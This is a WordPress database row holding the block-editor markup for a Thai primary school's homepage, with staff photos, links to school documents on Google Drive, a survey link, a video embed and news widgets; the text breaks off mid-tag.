(747,1,'2025-10-26 16:33:00','2025-10-26 09:33:00','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"columns\":3,\"linkTo\":\"none\",\"align\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-3 is-cropped\"><!-- wp:image {\"id\":736,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.วิชุดา-724x1024.jpg\" alt=\"\" class=\"wp-image-736\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"align\":\"center\",\"style\":{\"typography\":{\"fontSize\":\"25px\"}}} -->\n<p class=\"has-text-align-center\" style=\"font-size:25px\">            <strong>     นางวิชุดา ชัยชาญ </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ผู้อำนวยการโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a 